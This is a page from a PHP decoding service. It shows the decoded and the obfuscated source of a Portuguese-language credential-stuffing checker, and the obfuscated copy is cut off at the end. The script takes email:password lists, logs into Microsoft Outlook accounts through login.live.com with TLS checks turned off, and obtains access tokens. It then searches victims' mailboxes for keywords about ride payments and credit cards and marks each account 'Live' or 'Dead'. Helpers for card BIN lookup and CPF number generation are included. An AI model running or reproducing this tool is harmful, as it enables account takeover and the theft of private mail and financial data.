Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto JngNC; Qwj2R: $curl = curl_init($url); goto yoGz5; JngNC: error_reporting(0); ..

Decoded Output download

<?php 
goto JngNC; Qwj2R: $curl = curl_init($url); goto yoGz5; JngNC: error_reporting(0); goto yqhAm; UnevA: curl_setopt($curl, CURLOPT_POST, true); goto vafsY; u2Zgp: $lista = $_POST["lista"]; goto bYtwA; LIczG: $Login = curl_exec($curl); goto iZJ8F; oJ3mh: $headers = array("Host: outlook.live.com", "upgrade-insecure-requests: 1", "dnt: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto ewMwF; Fnk0L: function generate_email() { $domains = array("gmail.com", "hotmail.com", "yahoo.com", "outlook.com"); $domain = $domains[array_rand($domains)]; $timestamp = time(); $random_num = mt_rand(1, 10000); $email = "user_" . $timestamp . "_" . $random_num . "@{$domain}"; return $email; } goto u2Zgp; VO1DE: function trazer($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto dy0pD; Z6vHZ: $token = urlencode(trazer($pegar_tk, "name="PPFT" id="i0327" value="", """)); goto hjtmy; cE9Q7: curl_setopt($curl, CURLOPT_URL, $url); goto KsiV5; gfabt: $palavrachave = trim($_POST["palavrachave"]); goto JvE3b; JvE3b: $url = "https://outlook.live.com/owa/?nlp=1"; goto Qwj2R; wWtk3: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto sP_ta; hjtmy: $url = trazer($pegar_tk, "urlPostMsa:'", "'"); goto xzAul; QX0eH: $Login2 = curl_exec($curl); goto BtuTT; KsiV5: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto wl0mx; d_PL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto xFE9K; YQ9Pd: curl_setopt($curl, CURLOPT_URL, $url); goto jDUzV; rNEo1: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto TtEN8; TtEN8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto dXbPu; n4qBF: $headers = array("Host: login.live.com", "Upgrade-Insecure-Requests: 1", "DNT: 1", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto AVWL_; Sh_8C: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto U9SxT; AifEm: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto HbTSX; oTryB: function bin($cartao) { $contents = file_get_contents("../bins.csv"); $pattern = preg_quote(substr($cartao, 0, 6), "/"); $pattern = "/^.*{$pattern}.*$/m"; if (preg_match_all($pattern, $contents, $matches)) { $encontrada = implode("\xa", $matches[0]); } $pieces = explode(";", $encontrada); $resultado = array("string" => "{$pieces["1"]} - {$pieces["2"]} - {$pieces["3"]} - {$pieces["4"]} - {$pieces["5"]}", "pieces1" => "{$pieces["1"]} - {$pieces["4"]} - {$pieces["5"]}"); return $resultado; } goto Z85YX; xzAul: $curl = curl_init($url); goto SRLk3; dXbPu: $get_2 = curl_exec($curl); goto C0yew; ewMwF: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto rNEo1; G70vs: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto n4qBF; dy0pD: function multiexplode($string) { $delimiters = array("|", ";", ":", "/", "\302\273", "\302\xab", ">", "<"); $one = str_replace($delimiters, $delimiters[0], $string); $two = explode($delimiters[0], $one); return $two; } goto oTryB; iQcLE: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto nBUWq; OArEs: $data = "i13=0&login={$email}&loginfmt={$email}&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd={$senha}&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT={$token}&PPSX=Passp&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=8008"; goto GzFjD; Z85YX: function gerarCPF() { for ($i = 0; $i < 9; $i++) { $cpf[$i] = mt_rand(0, 9); } $soma = 0; for ($i = 0; $i < 9; $i++) { $soma += $cpf[$i] * (10 - $i); } $resto = $soma % 11; $cpf[9] = $resto < 2 ? 0 : 11 - $resto; $soma = 0; for ($i = 0; $i < 10; $i++) { $soma += $cpf[$i] * (11 - $i); } $resto = $soma % 11; $cpf[10] = $resto < 2 ? 0 : 11 - $resto; return implode('', $cpf); } goto Fnk0L; fs44E: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto TJbyx; iZJ8F: $token2 = trazer($Login, "sFT:'", "'"); goto ohrtF; z4bbP: curl_setopt($curl, CURLOPT_HEADER, true); goto iQcLE; sP_ta: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto QX0eH; H6gE8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto LIczG; SRLk3: curl_setopt($curl, CURLOPT_URL, $url); goto UnevA; c9nb2: $pegar_tk = curl_exec($curl); goto Z6vHZ; xFE9K: $data = "LoginOptions=3&type=28&ctx=&hpgrequestid=&PPFT=" . urlencode($token2) . "&DontShowAgain=true&i19=4037"; goto EdIdG; yqhAm: if (file_exists("cookie.txt")) { unlink("cookie.txt"); } goto VO1DE; U9SxT: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto d_PL_; nROrv: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto mp1p9; jDUzV: curl_setopt($curl, CURLOPT_POST, true); goto fs44E; bYtwA: $email = trim(multiexplode($lista)[0]); goto o62Mj; yoGz5: curl_setopt($curl, CURLOPT_URL, $url); goto z4bbP; GzFjD: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto sYdwj; TVS4x: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto oJ3mh; I46rY: $curl = curl_init($url); goto YQ9Pd; mp1p9: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto OArEs; ohrtF: $url = trazer($Login, "urlPost:'", "'"); goto I46rY; o62Mj: $senha = trim(multiexplode($lista)[1]); goto gfabt; LMu8v: $curl = curl_init($url); goto cE9Q7; joD4m: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto c9nb2; wl0mx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto G70vs; AVWL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto tdUoT; vafsY: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto AifEm; tdUoT: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto joD4m; TJbyx: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto Sh_8C; sYdwj: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto H6gE8; nBUWq: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto TVS4x; HbTSX: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto nROrv; C0yew: $url = trim(trazer($get_2, "location: ", "server:")); goto LMu8v; EdIdG: curl_setopt($curl, CURLOPT_POSTFIELDS, $data); goto wWtk3; BtuTT: if (strpos($Login2, "pprid")) { $auth = trazer($Login2, "RpsCsrfState=", "&"); $pprid = trazer($Login2, "name="pprid" id="pprid" value="", """); $NAP = trazer($Login2, "name="NAP" id="NAP" value="", """); $ANON = trazer($Login2, "name="ANON" id="ANON" value="", """); $t = urlencode(trazer($Login2, "name="t" id="t" value="", """)); $url = "https://outlook.live.com/owa/?exch=1&nlp=1&RpsCsrfState={$auth}&wa=wsignin1.0"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "origin: https://login.live.com", "dnt: 1", "upgrade-insecure-requests: 1", "content-type: application/x-www-form-urlencoded", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "wbids=0&pprid={$pprid}&wbid=MSFT&NAP={$NAP}&ANON={$ANON}&t={$t}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $url = "https://outlook.live.com/owa/0/?exch=1&nlp=1&RpsCsrfState={$auth}"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "cache-control: max-age=0", "dnt: 1", "upgrade-insecure-requests: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "sec-fetch-site: same-site", "sec-fetch-mode: navigate", "sec-fetch-dest: document", "referer: https://login.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=1"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary2 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=9"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary2}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary3 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAttachmentPreviews&app=Mail&n=16"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary3}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json; charset=utf-8", "action: GetAttachmentPreviews", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary4 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetBposShellInfoNavBarData&app=Mail&n=18"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HEADER, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary4}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%7D", "content-type: application/json; charset=utf-8", "action: GetBposShellInfoNavBarData", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $canary5 = trazer($resp, "X-OWA-CANARY=", ";"); $url = "https://outlook.live.com/owa/0/service.svc?action=GetAccessTokenforResource&UA=0&app=Mail&n=21"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); $headers = array("Host: outlook.live.com", "prefer: exchange.behavior="IncludeThirdPartyOnlineMeetingProviders"", "dnt: 1", "x-req-source: Mail", "x-owa-canary: {$canary5}", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "x-owa-urlpostdata: %7B%22__type%22%3A%22TokenRequest%3A%23Exchange%22%2C%22Resource%22%3A%22https%3A%2F%2Foutlook.live.com%22%7D", "content-type: application/json; charset=utf-8", "action: GetAccessTokenforResource", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/", "accept-language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "--compressed"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $resp = curl_exec($curl); $key = trazer($resp, ""AccessToken":"", """); $url = "https://outlook.live.com/search/api/v2/query?n=162&cv=P79J1Me7qJtd%2FXk37TRvUI.175"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $headers = array("Host: outlook.live.com", "x-search-griffin-version: GWSv2", "dnt: 1", "scenariotag: 1stPg_mg", "x-ms-appname: owa-reactmail", "accept-language: pt-BR", "authorization: Bearer {$key}", "x-anchormailbox: SMTP:{$email}", "x-client-flights: OWA_BestMatch_V15,CalendarInsightsFlight,EnablePeoplePillGhostingOWA,CalendarAnswerFlight,CalendarAnswerWithQas,CalendarAnswerConflicts,CalendarInsightsFlight,ConflictsInCalendarInsights,bfbfileansoff,FetchFileArtifacts", "x-req-source: Mail", "sec-ch-ua-mobile: ?0", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "content-type: application/json", "x-routingparameter-sessionkey: SMTP:{$email}", "accept: */*", "origin: https://outlook.live.com", "sec-fetch-site: same-origin", "sec-fetch-mode: cors", "sec-fetch-dest: empty", "referer: https://outlook.live.com/"); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); $data = "{"Cvid":"a4e28ad5-ca54-aa32-58ce-e2e278b40886","Scenario":{"Name":"owa.react"},"TimeZone":"UTC-02","TextDecorations":"Off","EntityRequests":[{"EntityType":"Message","ContentSources":["Exchange"],"Filter":{"Or":[{"Term":{"DistinguishedFolderName":"msgfolderroot"}},{"Term":{"DistinguishedFolderName":"DeletedItems"}}]},"From":0,"Query":{"QueryString":"" . $palavrachave . ""},"RefiningQueries":null,"Size":25,"Sort":[{"Field":"Score","SortDirection":"Desc","Count":3},{"Field":"Time","SortDirection":"Desc"}],"EnableTopResults":true,"TopResultsCount":3}],"AnswerEntityRequests":[{"Query":{"QueryString":"" . $palavrachave . ""},"EntityTypes":["Event","File"],"From":0,"Size":10,"EnableAsyncResolution":true}],"QueryAlterationOptions":{"EnableSuggestion":true,"EnableAlteration":true,"SupportedRecourseDisplayTypes":["Suggestion","NoResultModification","NoResultFolderRefinerModification","NoRequeryModification","Modification"]},"LogicalId":"3a50ac5c-ecb1-dabb-263a-2ba10309368a"}"; curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); $verificar = curl_exec($curl); if (strpos($verificar, $palavrachave)) { $palavra = "<span class='text-success'>Sim</span>"; if ($palavrachave == "Equipe 99") { if (strpos($verificar, "Cart\xc3\xa3o de Cr\xc3\251dito")) { $cartao = "<span class='text-success'>Sim</span>"; } else { $cartao = "<span class='text-danger'>N\303\xa3o</span>"; } if (strpos($verificar, "Dinheiro")) { $Dinheiro = "<span class='text-success'>Sim</span>"; } else { $Dinheiro = "<span class='text-danger'>N\303\xa3o</span>"; } $msg = trazer($verificar, "Total", "escolher"); $dados = "<span class='text-warning'>[Corridas no Dinheiro:</span> {$Dinheiro}<span class='text-warning'>|Corridas no Cart\303\xa3o:</span> {$cartao}<span class='text-warning'><span class='text-info'>|Ultima Corrida: {$msg} escolher</span><span class='text-warning'>] \xe2\236\234 </span>"; } } else { $palavra = "<span class='text-danger'>N\xc3\243o</span>"; } echo "<br><span class='text-success'>[#Live] \xe2\x9e\x9c </span> 
        <span class='text-info'>{$lista} \342\x9e\x9c </span>{$dados}\xa        <span class='text-warning'>[Contem email relacionado a {$palavrachave}: {$palavra}] \342\236\234</span> 
        <span class='text-info'>Center-509</span><br>"; curl_close($curl); die; } else { echo "<br><span class='text-warning'>[#Dead] \xe2\236\234 </span> 
        <span class='text-info'>{$lista} \342\236\x9c </span>\xa        <span class='text-danger'>[Your account or password is incorrect] \342\x9e\234 </span>\xa        <span class='text-info'>Center-509</span><br>"; curl_close($curl); die; } ?> 
?>

Did this file decode correctly?

Original Code

<?php
goto JngNC; Qwj2R: $curl = curl_init($url); goto yoGz5; JngNC: error_reporting(0); goto yqhAm; UnevA: curl_setopt($curl, CURLOPT_POST, true); goto vafsY; u2Zgp: $lista = $_POST["lista"]; goto bYtwA; LIczG: $Login = curl_exec($curl); goto iZJ8F; oJ3mh: $headers = array("Host: outlook.live.com", "upgrade-insecure-requests: 1", "dnt: 1", "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto ewMwF; Fnk0L: function generate_email() { $domains = array("gmail.com", "hotmail.com", "yahoo.com", "outlook.com"); $domain = $domains[array_rand($domains)]; $timestamp = time(); $random_num = mt_rand(1, 10000); $email = "user_" . $timestamp . "_" . $random_num . "@{$domain}"; return $email; } goto u2Zgp; VO1DE: function trazer($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto dy0pD; Z6vHZ: $token = urlencode(trazer($pegar_tk, "name="PPFT" id="i0327" value="", """)); goto hjtmy; cE9Q7: curl_setopt($curl, CURLOPT_URL, $url); goto KsiV5; gfabt: $palavrachave = trim($_POST["palavrachave"]); goto JvE3b; JvE3b: $url = "https://outlook.live.com/owa/?nlp=1"; goto Qwj2R; wWtk3: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto sP_ta; hjtmy: $url = trazer($pegar_tk, "urlPostMsa:'", "'"); goto xzAul; QX0eH: $Login2 = curl_exec($curl); goto BtuTT; KsiV5: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto wl0mx; d_PL_: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto xFE9K; YQ9Pd: curl_setopt($curl, CURLOPT_URL, $url); goto jDUzV; rNEo1: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); goto TtEN8; TtEN8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto dXbPu; n4qBF: $headers = array("Host: login.live.com", "Upgrade-Insecure-Requests: 1", "DNT: 1", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"); goto AVWL_; Sh_8C: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto U9SxT; AifEm: curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd() . "/cookie.txt"); goto HbTSX; oTryB: function bin($cartao) { $contents = file_get_contents("../bins.csv"); $pattern = preg_quote(substr($cartao, 0, 6), "/"); $pattern = "/^.*{$pattern}.*$/m"; if (preg_match_all($pattern, $contents, $matches)) { $encontrada = implode("\xa", $matches[0]); } $pieces = explode(";", $encontrada); $resultado = array("string" => "{$pieces["1"]} - {$pieces["2"]} - {$pieces["3"]} - {$pieces["4"]} - {$pieces["5"]}", "pieces1" => "{$pieces["1"]} - {$pieces["4"]} - {$pieces["5"]}"); return $resultado; } goto Z85YX; xzAul: $curl = curl_init($url); goto SRLk3; dXbPu: $get_2 = curl_exec($curl); goto C0yew; ewMwF: curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); goto rNEo1; G70vs: curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd() . "/cookie.txt"); goto n4qBF; dy0pD: function multiexplode($string) { $delimiters = array("|", ";", ":", "/", "\302\273", "\302\xab", ">", "<"); $one = str_replace($delimiters, $delimiters[0], $string); $two = explode($delimiters[0], $one); return $two; } goto oTryB; iQcLE: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto nBUWq; OArEs: $data = "i13=0&login={$email}&loginfmt={$email}&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd={$senha}&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT={$token}&PPSX=Passp&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i19=8008"; goto GzFjD; Z85YX: function gerarCPF() { for ($i = 0; $i < 9; $i++) { $cpf[$i] = mt_rand(0, 9); } $soma = 0; for ($i = 0; $i < 9; $i++) { $soma += $cpf[$i] * (10 - $i); } $resto = $soma % 11; $cpf[9] = $resto < 2 ? 0 : 11 - $resto; $soma = 0; for ($i = 0; $i < 10; $i++) { $soma += $cpf[$i] * (11 - $i); } $resto = $soma % 11; $cpf[10] = $resto < 2 ? 0 : 11 - $resto; return implode('', $cpf); } goto Fnk0L; fs44E: curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); goto TJbyx; iZJ8F: $token2 = trazer($Login, "sFT:'", "'"); goto ohrtF; z4bbP: curl_setopt($curl, CURLOPT_HEADER, true); goto iQcLE; sP_ta: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto QX0eH; H6gE8: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); goto LIczG; SRLk3: curl_setopt($curl, CURLOPT_URL, $url); goto UnevA; c9nb2: $pegar_tk = curl_exec($curl); goto Z6vHZ; xFE9K: $data = "LoginOptions=3&type=28&ctx=&hpgrequestid=&PPFT=" . urlencode($token2) . "&DontShowAgain=true&i19=4037"; goto EdIdG; yqhAm: if (file_exists("cookie.txt")) { unlink("cookie.txt"); } goto VO1DE; U9SxT: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto d_PL_; nROrv: $headers = array("Host: login.live.com", "Cache-Control: max-age=0", "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Content-Type: application/x-www-form-urlencoded"); goto mp1p9; jDUzV: 